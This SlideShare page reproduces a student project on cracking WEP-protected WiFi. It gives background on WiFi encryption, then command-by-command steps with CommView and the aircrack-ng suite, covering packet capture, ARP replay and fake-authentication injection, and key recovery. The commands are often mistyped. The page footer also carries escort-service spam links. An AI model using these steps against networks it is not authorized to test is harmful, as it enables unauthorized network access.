SlideShare une entreprise Scribd logo

Wifi cracking Step by Step Using CMD and Kali Linux 2018

Mohammad Fareed
Mohammad Fareed

This document discusses cracking WEP encrypted WiFi networks. It begins with introductions to WiFi technology and encryption methods like WEP, WPA, and WPA2. It then provides steps to crack WEP networks using tools like Aircrack-NG on Windows and Kali Linux. For Windows, it describes using CommView to capture packets and Aircrack-NG GUI to crack passwords. For Kali, it outlines passive and active cracking techniques, including using airodump-ng to capture packets and aireplay-ng to generate more packets through ARP request replays and fake authentication attacks before cracking passwords with Aircrack-NG. The goal is to capture enough initialization vectors to crack weak WEP encryption keys.

Ingénierie
1  sur  24
* Contents *Introduction. *HISTORY AND TYPES OF WiFi. *What ARE WIFI NETWORK *IMPORTANT TERMINOLOGY *Wi-Fi SECURITY: METHODS OF WiFi *WEP ENCRYPION *WEP CRACKING USING WINDOWS *WEP CRACKING USING KALI *RESEARCH PAPERS *REFERENCES Project Name: Wifi Cracking Student Name: Mohammad Fareed University: MMMUT Gorakhpur E-mail ID: mohd.fareed1122@gmail.com
* INTRODUCTION * Wi-Fi has emerged as the single most popular wireless network protocol of the 21st century. While other wireless protocols work better in certain situations, Wi-Fi technology powers most home networks, many business local area networks and public hotspot networks. * Some people erroneously label all kinds of wireless networking as “Wi-Fi” when in reality Wi-Fi is just one of many wireless technologies. * Research Paper: The security of wifi connections has been in and out of the news over the past * few years as the integrity of the wifi encryption process has been progressively * eroded. Wifi encryption is normally driven by the use of three flavours of passwords/ * passphrases – Wired Equivalent Privacy (WEP), Wifi Protected Access * (WPA) and WPA2 – which use different methodologies to ensure (to differing * degrees) the integrity of the wifi IP-based communications path. But all have * come under attack, with tools available to intercept and crack authentication. * Does this mean that wifi should now be considered insecure?
* HISTORY AND TYPES OF WiFi * In the 1980s, a technology designed for wireless cash registers called WaveLAN was developed and shared with the Institute of Electrical and Electronics Engineers (IEEE) group responsible for networking standards, known as committee 802. This technology was further developed during the 1990s until the committee published standard 802.11 in 1997. * The initial form of Wi-Fi from that 1997 standard supported only 2 MBPS connections. This technology was not officially known as “Wi-Fi” from the beginning either; that term was coined only a few years as its popularity increased. An industry standards group has continued to evolve the standard ever since, generating a family of new versions of Wi-Fi called successively 802.11b, 802.11g, 802.11n, 802.11ac, and so on. Each of these related standards can communicate with each other, although newer versions offer better performance and more features. * Research Paper: Integrity in question * In 2004, the integrity of the WEP password system was called into question after the Aircrack wifi password-cracking suite was released. The open source suite – now known as Aircrack-ng and updated to perform attacks on the WPA/ WPA2 wifi password systems – consisted of a number of wireless auditing utilities: * • Airodump – a 802.11 packet capture program. * • Aireplay – a 802.11 packet injection program. * • Aircrack – a static WEP and WPAPSK key cracker. * • Airdecap – which decrypts WEP/WPA capture files.Because the amount of time it takes to hack an encrypted wireless network is dependent on the amount of traffic that the cracking software has access to, thesecond module of Aircrack – Aireplay –is viewed as the most useful program of the four, as it allows the wireless hacker to increase the network traffic and so speed up the hacking process. The third and fourth elements of the suite – Aircrack and Airdecap – were (and still are) useful to crackers because they work for both WEP and WPA encryption, although back in 2004 the processing power available at that time made the cracking of a WPA password a lengthy process – normally taking several weeks, even where multi-core processing power was used. This contrasted with a typical cracking time for WEP (in 2004) of 20 minutes or so – a time-frame that has been reduced to around 30 seconds using commercial software from Elcomsoft and others, as well as open source/freeware apps/ suites such as Aircrack.
* What ARE WIFI NETWORK? Most of you would have used wireless network either in your college, office, hotel or airports. Wireless network have become so very common everywhere due to their great convenience and growing popularity of laptops. Typically an area that offers wireless internet access is known as a hotspot. Wi-Fi can be configured in one of two modes, called infrastructure mode Wi-Fi and ad-hoc mode Wi-Fi. Nearly all Wi- Fi setups use infrastructure mode, where client devices within range all connect to and communicate through a central wireless access point. Ad hoc Wi-Fi allows clients to connect directly to each other without the use of an access point * IMPORTANT TERMINOLOGY SSID: is short for service set identifier. It is public name of wireless network, which is used to identify a particular network.SSIDs are case sensitive and are a sequence of alphanumeric characters(letters or numbers). BSSID: stand for basic service set identifier is the 48-bit MAC address of the access point of a wireless network. WIRELESS ACCESS POINT: is a device that allows device (like laptop, mobile device)to connected to a wireless network using wifi & other wireless standards.
PSK: stand for pre shared key and is commonly used in encryption system. It is a possword or secret key that is shared amonge all the users using that particular encryption system. RSSI: is short for received signal stregnth indication and reprenteds the signal strength of a wireless network. RSSI values range from 1 to 100. *Wi-Fi SECURITY: METHODS OF WiFi * Before cracking a Wi- Fi network, you must be aware of basic encryption techniques that protect a Wi-Fi network. These three methods of encryption are the major sources of vulnerability associated with wireless networks. The different types of Wireless Encryption Security techniques include the following: * WEP: WEP is Wired Equivalent Privacy that can be cracked easily when configured appropriately. This method of encryption can be cracked within few minutes. * WPA: WPA is Wi-Fi Protected Access that provides strong security. Even then, there is possibility to crack if the Wi-Fi password if short. However, wireless networks can be hacked easily using various tools. * WPA2: WPA2 is Wi-Fi Protected Access 2 that also eventually provides high security. You can hack this method of Wi-Fi encryption at the time of packet generation from Wi-Fi access points. MAC ADDRESS: start for media access control address is a 48bit unique address that identifier every node in network. Usually MAC address are assigned at the time of manufacture itself. for example, 00:02:2D17B9:E8 is a typical MAC address.
* WEP ENCRYPION WEP stand for wired enquivalent privacy and it is a security protocol that encrypts data transmission over wireless network using a secret wepkey. There are typically 3 times of WEP key: 1) OFF. 2) 64-Bit. 3) 128 Bit.  WEAKNESS IN WEP ENCRYPTION: In the wep protocol the AP and All the client(users) connected to a wireless network should know the same security key or password. If the user does not know the wep shared key or password, then the user may not be allowed to connect the network. This gives an attacker planty of time to find out the encryption key of the network. Depending upon the network, the password of the user is usually 40bit or 104 bit. This is concatenated with the 24 IV vector to get a 64 bit or 128bit wep key. Which is used for encrypting all data packets. It took until December 2009 before leading security researcher Moxie Marlinspike – who has since gone on to develop a number of smartphone and tablet computing crypto applications for the Android platform – launched the WPAcracker.com website.1 Using a parallel processing set of servers, Marlinspike claimed that his systems could crack vulnerable WPA passwords in around 20 minutes, a process that would have taken a dual-core PC around 120 hours using suitable software at the time. The cloud-based service – which costs $17.00 a time – reportedly uses a400-node cluster of computers to run through around 130 million WPA password combinations in 20 minutes. To use the service, Internet users upload a copy of the handshake file that occurs when a wifi device starts negotiating a link with a wifi access point – downloaded off-air using AirCrack’s Airodump module or an open source utility such as Wireshark. Although Wireshark is generally best known as a packet sniffer and analyser, widely used for network troubleshooting, analysis, software and communications protocol development – its considerable evolution, since it was first launched as Ethereal, makes it a popular wifi analysis tool. The evolution of WPAcracker.com was notable in wireless cracking terms as – according to Marlinspike – although rainbow tables can be used to brute-force crack a WPA password, the process is truly brute force in nature because each cracking project is unique. As Marlinspike observes: “You have to build a unique set of rainbow tables for each network that you would potentially like to audit.” A rainbow table is essentially a precomputed table for reversing cryptographic hash functions, typically used for cracking password hashes.
* WEP CRACKING USING WINDOWS • Your require the following tools to crack wep network using windows: • CommView for WiFi. • Aircrack-ng GUI windows. • Compatible wifi card that supports monitor mode. Step1: Start the commView app, it will put your network adaptor in the monitor mode and allow you to record data packets being transmitted across all the wifi network within range select any wep network that you want to crack choose a network has a good signal strength. Step2: Right click on the wep network & select the copy MAC address option. Step3: Select the Rules Tab in the menu at the top. Select mac address on the left column, anable MAC address rules in the center, select capture in the action and select both under add record paste the copied MAC address press the add MAC address mode. Step4: Click on the log in tab, enable auto saving and increase maximum directory size and average log file size options. Step5: now wait untill CmmView record around 10,000 gatra packets. Monitor the number of data packets by clicking on the packets tab. Step6: when you have around 10,000 data packets, then go to the login tab and then click the CONCATENATE LOGS button, select all the capture file option and save the combined log file anywhere on the your computer.
Step7: Double click on the logfile, if you notice, 9247 dta packets has been recorded in this log file. Step8: Click on the file>export logs> wireshark/ TCP dump format and log file in the selected format anywhere on your computer. Strep9:Unzip the download file of aircrack-ng GUI and launch the Aircrack GUI application from the BIN folder. Step10: Aircrack-ng will launch and will automatically try to crack password. In the this case if you notice, it failed and tells me to try recording more data packets/Ivs. Step11: Lets wait till I have recorded 21628 dta packets/Ivs. Step12: Input the logfiles into Aircrack-ng and lets try againg! Step13: And now when I run aircrack-ng again, it cracks the password and displays it on the screen! As simple as that.
WiFi Cracking using only cmd:
* WEP CRACKING USING KALI You require the following crack wep network using Kali:  Kali linux Vmware or ISO.  Aircrack-ng.  Compatible wifi network card. Aircrack-ng suit of the tools comes with the following setr of tools: 1) Airmon-ng 2) Airodump-ng 3) Aireplay-ng 4) Aircrack-ng WEP Cracking using Kali are two types: 1) PASSIVE Technique 2) ACTIVE Technique PASSIVE WEP CRACKING TECHNIQUE Passive wep cracking is a technique where the attacker tries to crack the password by passively sniffing Ivs of the target network without sending/injecting any traffic to it. Step1: Put Your WiFi card into monitor mode: Put your wifi card in monitor mode so that it can listen to all packet being transmitted and not just packets send to your system. airmon-ng start wifi_interface_name For example, airmon-ng start wlan0
a) check status of network interfaces: ifconfig b) Put wifi interface into monitor mode: airmon-ng start wlan0 c) Ensure wifi interface is in monitor mode: ifconfig (NOTE: if you notice secondary interface called mon0 is used when your wifi interface is put into monitor mode) d) Lets see what wifi networks we are able to catch: airdump-np wlan0 Step2: START DATA SNIFFER TO RECORD IVs: Capture Ivs of data packets being transmitted an only the target wifi network and ignore all other data packets: airodump-ng-c channel—bssid APMAC –w outputfile interface airodump-ng-c1—bssid 48:28:2F:DC:F5:D8 –w dump wlan0 Capture Ivs of data packets being transmitted only on the target wep network ingnore the rest. Step3:CRACKTHE WEP PASSWORD FROM THE CAPTURED IVS: Once you have captured enough number of Ivs(20,000-40,000) you can crack the wep passsword using the aircrack tool: aircrack-ng –b AP_MAC*.cap Another alternative technique is to use the FMS/korek technique: Aircrack-ng –k –b AP_MAC*.cap For example, in today”s example I will type: Aircrack-ng –b 48:28:2F:D5:D8 dump*.cap
Step4: LET’S SEE WHAT WiFi NETWORKS WE ARE ABLE TO CATCH: airodump-ng wlan0 Important: Identify the BSSID(48:28:2F:D5:D8) and chabeel(1) of the wifi network you wish to crack and write it down somewhere, you will need them in the next step. * ACTIVE CRACKING WEP PASSWORD USING KALI The problem with Passive wep cracking is that it can take a very long since you have to wait for adequate number of Ivs to be captured, which can take 3-4 hours, if there is not enough traffic/active clients on the target wifi. In Active wep cracking; the attacker actively ingets data packets to target wifi network to generate additional Ivs and reduce the amount of time it takes to crack the password. Step1: PUT YOUR WiFi CARD INTO MONITOR MODE: Put wireless interface in monitor mode on the AP channel so that it can listen to All packet being transmitted and not just packets send to your system for example, airmon-ng start wlan0 Step2: TEST WHETHER INJECTION IS POSSIBLE OR NOT: Test whether your wifi card and the target wifi router are within close enough range for your computer to be able inject data packets into it. Not all wifi cards support data injection. aireplay-ng -9 interfacenam For example, aireplay-ng-9 mon0
Step3: START DATA SNIFFER TO RECORD IVs: Capture Ivs of the data packets being transmitted on only the target wifi network and ignore all other data packets. airodump-ng –c chaneel –bssid APMAC –w output interface Airodump-ng –c1 –bssid 48:28:2F:D5:D8 –w dump mon0 Step4: ARP REQUEST REPLAY ATTACK: In order to crack wep keys it is important for an attacker to be able to record large number of Ivs from data packets being send across the target network. An ARP request replay attack can easily be executed using the aireplay-ng tool: aireplay-ng –arpreplay –b AP_MAC_FACKE_auth interfacename For example, aireplay-ng –arpreplay –48:28:2F:DC:F5:D8 mon0 Step5: FAKE AUTHENTICATION ATTACK: In the ARP request replay attack, the attacker sends an ARP packet to the router of the target wifi network AP so that it will; generate more Ivs. Fake authentication attack allows an attacker to associate its MAC address with the AP, so that it will not reject the ARP packets send to it in the ARP request replay attatck. This ensure that the target AP will generate new Ivs that can then the sniffed by the attacker to crack the wep key. Aireplay-ng -1 0 –e ESSID –a AP_MAC interfacename Step6: ARP REQUEST REPLAY ATTACK(ALTERNATE TECHNIQUE): In case airodump-ng shows you some order device that is already associated with the target wifi AP, then you can skip fake authentication and directyly perform ARP request replay attack using the MAC address of the associated device. For example, aireplay-ng –arpreplay –b 48:28:2F:D5:D8 –h 1C:65:9D:C6:47:29 mon0 (where -h is used to specify MAC address of the associated device).
Step7: CRACK THE WEP PASSWORD FROM THE CAPTURED IVs: Once you have captured enough number of Ivs, you can try to crack the wep password using the aircrack tool: aircrack-ng –b AP_MAC*.cap Another alternative techniquye is to use the FMS/korek technique: Aircrack-ng-k-b AP_MAC*.cap Crack the WEP password from the captured Ivs Aircrack-ng –b 48:28:2F:D5:D8 dump*.cap After 15,000 Ivs the WEP password has now been cracked.
* RESEARCH PAPERS
*

Recommandé

Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxMairajuddeen
 
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityHow Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityAhmad Yar
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking Mehul Jariwala
 
Aircrack
AircrackAircrack
AircrackMuhammadHanzalah6
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Fábio Afonso
 
Wi-fi Hacking
Wi-fi HackingWi-fi Hacking
Wi-fi HackingPaul Gillingwater, MBA
 
Firewall & Proxy Server
Firewall & Proxy ServerFirewall & Proxy Server
Firewall & Proxy ServerLakshyaArora12
 
How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngOpen Knowledge Nepal
 

Recommandé

Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxMairajuddeen
 
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityHow Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityAhmad Yar
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking Mehul Jariwala
 
Aircrack
AircrackAircrack
AircrackMuhammadHanzalah6
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Fábio Afonso
 
Wi-fi Hacking
Wi-fi HackingWi-fi Hacking
Wi-fi HackingPaul Gillingwater, MBA
 
Firewall & Proxy Server
Firewall & Proxy ServerFirewall & Proxy Server
Firewall & Proxy ServerLakshyaArora12
 
How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngOpen Knowledge Nepal
 
Wpa vs Wpa2
Wpa vs Wpa2Wpa vs Wpa2
Wpa vs Wpa2Nzava Luwawa
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hackingarushi bhatnagar
 
802.1x
802.1x802.1x
802.1xakruthi k
 
Iptables in linux
Iptables in linuxIptables in linux
Iptables in linuxMandeep Singh
 
Wifi Security
Wifi SecurityWifi Security
Wifi SecurityAgris Ameriks
 
Wifi Security
Wifi SecurityWifi Security
Wifi SecurityShital Kat
 
3 aruba arm and cm
3 aruba arm and cm3 aruba arm and cm
3 aruba arm and cmVenudhanraj
 
Palo alto networks next generation firewalls
Palo alto networks next generation firewallsPalo alto networks next generation firewalls
Palo alto networks next generation firewallsCastleforce
 
WPA 3
WPA 3WPA 3
WPA 3diggu22
 
Hardware firewall
Hardware firewallHardware firewall
Hardware firewallSubrata Kumer Paul
 
531: Controlling access to your IBM MQ system
531: Controlling access to your IBM MQ system531: Controlling access to your IBM MQ system
531: Controlling access to your IBM MQ systemRobert Parker
 
WiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & DefenceWiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & DefencePrakashchand Suthar
 
Wireshark Traffic Analysis
Wireshark Traffic AnalysisWireshark Traffic Analysis
Wireshark Traffic AnalysisDavid Sweigert
 
Wireless network security
Wireless network securityWireless network security
Wireless network securityShahid Beheshti University
 
WEP
WEPWEP
WEPSudeep Kulkarni
 
ASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & AnswersASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & AnswersNetProtocol Xpert
 
Firewall and Types of firewall
Firewall and Types of firewallFirewall and Types of firewall
Firewall and Types of firewallCoder Tech
 
WPA-3: SEA and Dragonfly
WPA-3: SEA and DragonflyWPA-3: SEA and Dragonfly
WPA-3: SEA and DragonflyNapier University
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentationMuhammad Zia
 
Firewall
FirewallFirewall
Firewallreddivarihareesh
 
Viable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be JeopardizedViable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be JeopardizedIRJET Journal
 
IJCER (www.ijceronline.com) International Journal of computational Engineerin...
IJCER (www.ijceronline.com) International Journal of computational Engineerin...IJCER (www.ijceronline.com) International Journal of computational Engineerin...
IJCER (www.ijceronline.com) International Journal of computational Engineerin...ijceronline
 

Contenu connexe

Tendances

3 aruba arm and cm
3 aruba arm and cm3 aruba arm and cm
3 aruba arm and cmVenudhanraj
 
Palo alto networks next generation firewalls
Palo alto networks next generation firewallsPalo alto networks next generation firewalls
Palo alto networks next generation firewallsCastleforce
 
531: Controlling access to your IBM MQ system
531: Controlling access to your IBM MQ system531: Controlling access to your IBM MQ system
531: Controlling access to your IBM MQ systemRobert Parker
 
Wireshark Traffic Analysis
Wireshark Traffic AnalysisWireshark Traffic Analysis
Wireshark Traffic AnalysisDavid Sweigert
 
ASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & AnswersASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & AnswersNetProtocol Xpert
 
Firewall and Types of firewall
Firewall and Types of firewallFirewall and Types of firewall
Firewall and Types of firewallCoder Tech
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentationMuhammad Zia
 

Tendances (20)

Wpa vs Wpa2
Wpa vs Wpa2Wpa vs Wpa2
Wpa vs Wpa2
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
802.1x
802.1x802.1x
802.1x
 
Iptables in linux
Iptables in linuxIptables in linux
Iptables in linux
 
Wifi Security
Wifi SecurityWifi Security
Wifi Security
 
Wifi Security
Wifi SecurityWifi Security
Wifi Security
 
3 aruba arm and cm
3 aruba arm and cm3 aruba arm and cm
3 aruba arm and cm
 
Palo alto networks next generation firewalls
Palo alto networks next generation firewallsPalo alto networks next generation firewalls
Palo alto networks next generation firewalls
 
WPA 3
WPA 3WPA 3
WPA 3
 
Hardware firewall
Hardware firewallHardware firewall
Hardware firewall
 
531: Controlling access to your IBM MQ system
531: Controlling access to your IBM MQ system531: Controlling access to your IBM MQ system
531: Controlling access to your IBM MQ system
 
WiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & DefenceWiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & Defence
 
Wireshark Traffic Analysis
Wireshark Traffic AnalysisWireshark Traffic Analysis
Wireshark Traffic Analysis
 
Wireless network security
Wireless network securityWireless network security
Wireless network security
 
WEP
WEPWEP
WEP
 
ASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & AnswersASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & Answers
 
Firewall and Types of firewall
Firewall and Types of firewallFirewall and Types of firewall
Firewall and Types of firewall
 
WPA-3: SEA and Dragonfly
WPA-3: SEA and DragonflyWPA-3: SEA and Dragonfly
WPA-3: SEA and Dragonfly
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentation
 
Firewall
FirewallFirewall
Firewall
 

Similaire à Wifi cracking Step by Step Using CMD and Kali Linux 2018

Viable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be JeopardizedViable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be JeopardizedIRJET Journal
 
IJCER (www.ijceronline.com) International Journal of computational Engineerin...
IJCER (www.ijceronline.com) International Journal of computational Engineerin...IJCER (www.ijceronline.com) International Journal of computational Engineerin...
IJCER (www.ijceronline.com) International Journal of computational Engineerin...ijceronline
 
chapter 7 -wireless network security.ppt
chapter 7 -wireless network security.pptchapter 7 -wireless network security.ppt
chapter 7 -wireless network security.pptabenimelos
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hackingMihir Shah
 
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless NetworksLiving in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless NetworksChema Alonso
 
Wi fi protected access
Wi fi protected accessWi fi protected access
Wi fi protected accessLopamudra Das
 
How to Hack WiFi on Windows
How to Hack WiFi on Windows How to Hack WiFi on Windows
How to Hack WiFi on Windows Vrushank Narola
 
Talk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2bTalk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2bSylvain Martinez
 
White paper - Building Secure Wireless Networks
White paper - Building Secure Wireless NetworksWhite paper - Building Secure Wireless Networks
White paper - Building Secure Wireless NetworksAltaware, Inc.
 
Wireless Security – From A to Z – Types, Threats, To How to Secure.pdf
Wireless Security – From A to Z – Types, Threats, To How to Secure.pdfWireless Security – From A to Z – Types, Threats, To How to Secure.pdf
Wireless Security – From A to Z – Types, Threats, To How to Secure.pdfSeanHussey8
 
Pentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssuePentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssueIshan Girdhar
 
Wireless Security Needs For Enterprises
Wireless Security Needs For EnterprisesWireless Security Needs For Enterprises
Wireless Security Needs For Enterprisesshrutisreddy
 
Wireless hacking tools.jpeg
Wireless hacking tools.jpegWireless hacking tools.jpeg
Wireless hacking tools.jpegTushant sharma
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Securityamiable_indian
 
Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008ClubHack
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11bguestd7b627
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSreekanth GS
 
Research Inventy : International Journal of Engineering and Science
Research Inventy : International Journal of Engineering and ScienceResearch Inventy : International Journal of Engineering and Science
Research Inventy : International Journal of Engineering and Scienceinventy
 

Similaire à Wifi cracking Step by Step Using CMD and Kali Linux 2018 (20)

Viable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be JeopardizedViable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be Jeopardized
 
IJCER (www.ijceronline.com) International Journal of computational Engineerin...
IJCER (www.ijceronline.com) International Journal of computational Engineerin...IJCER (www.ijceronline.com) International Journal of computational Engineerin...
IJCER (www.ijceronline.com) International Journal of computational Engineerin...
 
chapter 7 -wireless network security.ppt
chapter 7 -wireless network security.pptchapter 7 -wireless network security.ppt
chapter 7 -wireless network security.ppt
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless NetworksLiving in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
 
Wi fi protected access
Wi fi protected accessWi fi protected access
Wi fi protected access
 
How to Hack WiFi on Windows
How to Hack WiFi on Windows How to Hack WiFi on Windows
How to Hack WiFi on Windows
 
Talk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2bTalk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2b
 
Wi Fi
Wi FiWi Fi
Wi Fi
 
White paper - Building Secure Wireless Networks
White paper - Building Secure Wireless NetworksWhite paper - Building Secure Wireless Networks
White paper - Building Secure Wireless Networks
 
Wireless Security – From A to Z – Types, Threats, To How to Secure.pdf
Wireless Security – From A to Z – Types, Threats, To How to Secure.pdfWireless Security – From A to Z – Types, Threats, To How to Secure.pdf
Wireless Security – From A to Z – Types, Threats, To How to Secure.pdf
 
Pentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssuePentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 Issue
 
Network security
Network securityNetwork security
Network security
 
Wireless Security Needs For Enterprises
Wireless Security Needs For EnterprisesWireless Security Needs For Enterprises
Wireless Security Needs For Enterprises
 
Wireless hacking tools.jpeg
Wireless hacking tools.jpegWireless hacking tools.jpeg
Wireless hacking tools.jpeg
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
 
Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11b
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11b
 
Research Inventy : International Journal of Engineering and Science
Research Inventy : International Journal of Engineering and ScienceResearch Inventy : International Journal of Engineering and Science
Research Inventy : International Journal of Engineering and Science
 

Dernier

Processing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxProcessing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxpranjaldaimarysona
 
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCollege Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCall Girls in Nagpur High Profile
 
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Bookingdharasingh5698
 
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingUNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingrknatarajan
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTING
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTINGMANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTING
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTINGSIVASHANKAR N
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Call Girls in Nagpur High Profile
 
UNIT-III FMM. DIMENSIONAL ANALYSIS
UNIT-III FMM. DIMENSIONAL ANALYSISUNIT-III FMM. DIMENSIONAL ANALYSIS
UNIT-III FMM. DIMENSIONAL ANALYSISrknatarajan
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Christo Ananth
 
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls in Nagpur High Profile
 
BSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptx
BSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptxBSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptx
BSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptxfenichawla
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
